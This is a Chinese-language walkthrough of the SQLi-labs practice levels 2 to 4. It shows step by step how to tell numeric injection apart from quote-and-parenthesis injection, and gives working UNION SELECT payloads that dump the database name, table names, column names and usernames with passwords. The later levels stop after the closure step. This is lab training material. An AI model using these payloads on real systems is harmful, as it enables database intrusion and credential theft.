Less2
GET_数字型注入
0x01 判断注入类型
?id=1
to use near ' LIMIT 0,1' at line 1
LIMIT 0,1
只有一个,没有单双引号,说明为数字型
后台查询语句
select username from users where id=1 limit 0,1
0x02 判断显示字段
?id=1 order by 4 --+
报错,有3列
0x03 查询数据库名
?id=-1 union select 1,database(),user() --+
0x04 查询表名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+
0x05 查询字段名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+
0x06 查询数据
?id=-1 union select 1,2,group_concat(username,password) from users --+
Less-3
GET_单引号_小括号_字符型注入
0x01 判断类型
?id=1'
use near ''1'') LIMIT 0,1' at line 1
'1'') LIMIT 0,1
单引号,单括号
0x02 判断显示字段
?id=1') order by 4 --+
Less-4
GET_双引号_单括号_字符型注入
0x01 类型判断
?id=1"
to use near '"1"") LIMIT 0,1' at line 1
"1"") LIMIT 0,1
双引号,单括号
0x02 闭合
?id=1") --+